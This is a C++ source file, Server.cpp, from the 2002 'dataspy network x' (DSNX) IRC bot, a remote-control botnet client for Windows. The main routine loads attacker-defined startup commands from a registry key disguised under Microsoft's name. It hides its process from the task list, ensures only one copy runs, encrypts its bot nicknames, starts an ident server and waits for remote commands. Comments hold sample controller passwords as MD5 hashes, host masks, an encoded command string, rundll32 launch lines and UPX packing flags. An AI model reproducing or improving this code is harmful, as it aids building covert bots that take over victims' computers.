 /*	
	dataspy network x version 0.5 beta
	Copyright (C) 2002 dataspy dot net INC

	This program is free software; you can redistribute it and/or
	modify it under the terms of the GNU General Public License
	as published by the Free Software Foundation; either version 2
	of the License, or (at your option) any later version.

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
	GNU General Public License for more details.

	You should have received a copy of the GNU General Public License
	along with this program; if not, write to the Free Software
	Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
  */

 /*

	Server.cpp

	Last revised : 31st March 2002

  */



#define WIN32_LEAN_AND_MEAN

#include <windows.h>
#include <winsock.h>
#include <stdlib.h>
#include <time.h>
#include <stdio.h>
#include <string.h>

#include "../include/dsnxsockets.h"
#include "..\include\commands.h"
#include "..\include\mainbot.h"
#include "..\include\identserver.h"
#include "..\include\tcp.h"
#include "..\include\SettingStorage.h"
#include "..\include\nickdb.h"
#include "..\include/pluginmanager.h"
#include "..\include\auth.h"
#include "..\include\md5.h"
#include "..\include\tea.h"

char c_QUITMSG[]	= "QUIT :0wned\r\n";
unsigned long l_UP =0;						//For Uptime
BOOL g_Shutdown =FALSE;
unsigned short g_Restart=0;

char *RegKey;
char *InstalledIn;

typedef void ( *RSPP)(DWORD,DWORD );
#define HOST_SPLIT_CHAR	';'

/*

	//MD5("password") == 5f4dcc3b5aa765d61d8327deb882cf99
	//MD5("superpass") == 82a3f212c95c1516907f27e1220c6f13
	//char c_DSNX_PASSWORD[]	= "";
	//char c_DSNX_HOSTMASK[]	= "nth*!*@*;home!na@ho;wazzahhhhh!;damn0r*;nthbit";
	//char c_DSNX_PREFIX[]	= "!";
	//char c_DSNX_REPLYTOCHAN[] =  "c";//r_CHANNEL;// r_QUERY r_NOTICE r_CHANNEL;
	//char c_DSNX_STARTUP[] =	"p *.dll\nm #unrealircd 192.168.0.3 6667";
	//char c_DSNX_STARTUP[] =	"m #dsnx localhost";

	mult "set PASS_5 ]}OC}2E5E}E3KhjYbYvY1E^2" "set PASS_1 4Wbf49]jprQWr^j4Yx8[jfhn" "set HSTS dataspy*;nth*;*" "set prfx !" "set rptc c" "set mlgn 1" "m #dsnx localhost"
	d aDNyeemPT0Jm-LygsPLV-1kXaRoNVoLom0{g6FFi|XkTcNc87Hq3X_8iDa16|HNks4DaDo{mRcFJaZa1Vqsi83i7iTBF-24uc`8-uZJ`e6k3Va7911{T_u6o-w6-sL1wP{g9iNH8T0yyuL0Pc0aRZk5TowiNig00qqk|a{_mT-2VcLF`Nqkwa7`2a89eN9ZPRV6g`3uwTL|D6u4s30qR3cVL1-k8R0Li2FJP_05c|DBs1au2F0aeX09k75-2y4_2wcHy-HkN{JZ___`RoJFw6iJ3yN1{F-8e

	AddSetting("PASS_5","82a3f212c95c1516907f27e1220c6f13",&g_SettingList);
	AddSetting("PASS_1","5f4dcc3b5aa765d61d8327deb882cf99",&g_SettingList);
	AddSetting("HSTS","dataspy*;nth*;*",&g_SettingList);
	AddSetting("PRFX","!",&g_SettingList);
	AddSetting("RPTC","c",&g_SettingList);

	*/

typedef DWORD (*pRegisterServiceProcess)(DWORD dwProcessId,DWORD dwType);

/*
  1. We get where the settings are stored in the registry from the command line
  2. We send the stored settings from the reg to CleanAndRun()

	RUNDLL.EXE <dllname>,<entrypoint> <optional arguments>

  RUNDLL32 ReleaseDll.dll,EntryPoint SOFTWARE\Microsoft\Data\DSNX
  rundll32 d:\download\releasedll.dll,EntryPoint

	//To run: rundll32 D:\DSNX0.5\ReleaseDLL\Release_Tiny\releasedll.dll,_EP@16 SOFTWARE\Microsoft\Data\DSNX

  rundll32 server.exe,_EntryPoint@16 SOFTWARE\Microsoft\Data\DSNX
  rundll32 server.dll,_EntryPoint@16 SOFTWARE\Microsoft\Data\DSNX

   To compress with upx : --compress-exports=0 --best
*/
//#undef DLL_LINK

#ifndef DLL_LINK

#define MAIN_RETURN(x) return (x);

int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpszCmdLine,int nCmdShow) {

#else 

#define MAIN_RETURN(x) return;

	extern "C" {

__declspec( dllexport ) void CALLBACK EntryPoint(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {

#endif

	char *RegStartup = NULL;
	USHORT timeout = 5000;
	MSG msg;

	if (lpszCmdLine) {

		HKEY hRegKey;
		DWORD dwDataLen,dwType;
		char *cSubKey=lpszCmdLine,*cValue;

		if (!strlen(lpszCmdLine))
			MAIN_RETURN(1);

		InstalledIn = strchr(cSubKey,' ');

		if (InstalledIn)
			*InstalledIn++ =0;

		cValue = strrchr(cSubKey,'\\');

		if(!cValue)
			MAIN_RETURN(1);


		*(cValue++) = 0;

		if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,cSubKey,0,KEY_READ,&hRegKey) != ERROR_SUCCESS)
			MAIN_RETURN(1);

		if (RegQueryValueEx(hRegKey,cValue,NULL,NULL,NULL,&dwDataLen) != ERROR_SUCCESS)
			MAIN_RETURN(1);

		if (!dwDataLen)
			MAIN_RETURN(1);

		RegStartup = (char*)malloc(dwDataLen);

		if (!RegStartup)
			MAIN_RETURN(1);

		if (RegQueryValueEx(hRegKey,cValue,NULL,&dwType,(unsigned char*)RegStartup,&dwDataLen) != ERROR_SUCCESS)
			MAIN_RETURN(1);

		RegCloseKey(hRegKey);

		cValue--;
		*cValue = '\\';

		RegKey = cSubKey;

	}

	HANDLE mutex = CreateMutex(NULL,TRUE,RegStartup);

	if (mutex == NULL || GetLastError() == ERROR_ALREADY_EXISTS) {
		free(RegStartup);
		MAIN_RETURN(0);
	}

	init_crc_table();
	srand((unsigned)time(NULL));

	AddStaticCommands();

//	DWORD read;
//	HANDLE file = CreateFile("d:\\dsnx0.5\\names.txt",GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL);
//	HANDLE out = CreateFile("d:\\dsnx0.5\\enc_names.txt",GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);

//	ReadFile(file,Nicks,GetFileSize(file,NULL),&read,NULL);

//	Encrypt((char*)Nicks,(unsigned long*)NickKey,read); 
	Encrypt((char*)Nicks,(unsigned long*)NickKey,NicksLen);

//	WriteFile(out,Nicks,read,&read,NULL);

	//Nicks[NLen] =0;


	//Uptime counter
	l_UP = GetTickCount();

	StartWinsock();

	IdentServer *ident = new IdentServer();
	ident->Insert(&g_IOList);

	//Wait for an internet connection (5 minutes intervals)
	//while(!IsConnected())
	//	Sleep(300000);

	//Register as a service process
	HINSTANCE hLibrary = LoadLibrary("KERNEL32.DLL");
	if (hLibrary != NULL){
		pRegisterServiceProcess RSP;
		RSP = (pRegisterServiceProcess)GetProcAddress(hLibrary,"RegisterServiceProcess");
		if	(RSP !=NULL)
			RSP(0,1);
	}

	CleanAndRun(RegStartup,NULL,NULL,NULL,NULL,MAX_AUTH_LVL+1);

	if (GetSetting("HSTS")) {

		USHORT count =1;
		char *buf = GetSetting("HSTS"),*original;

		original = buf;
		while (*buf) {

			if (*buf++ == HOST_SPLIT_CHAR)
				count++;
		}

		g_cHostAllows= new char*[count];
		g_cHostAllows[0] = original;

		while (g_cHostAllows[g_iHostAllows++]) {

			g_cHostAllows[g_iHostAllows] = strchr(g_cHostAllows[g_iHostAllows -1],HOST_SPLIT_CHAR);

			if (!g_cHostAllows[g_iHostAllows])
				break;

			*(g_cHostAllows[g_iHostAllows]++) = 0;

		}

	} else {

		g_cHostAllows = new char*[1];
		*g_cHostAllows = "*";
		g_iHostAllows = 1;
	}

	//Main Application Loop
	while (GetMessage(&msg, NULL, 0, 0) != 0 && !g_Shutdown) {
		TranslateMessage(&msg);
		DispatchMessage(&msg);
		Sleep(100);
	}
	
	//DSNXSocketDeleteArray();
	//UnloadPlugins();

	while ( timeout >0){
		Sleep(100);
		timeout -=100;
	}		

	WSACleanup();

	if (g_Restart > 0) {
		//WinExec(cTemp,SW_HIDE);
	}

	ReleaseMutex(mutex);
	MAIN_RETURN(0);


}
#ifdef DLL_LINK

}
#endif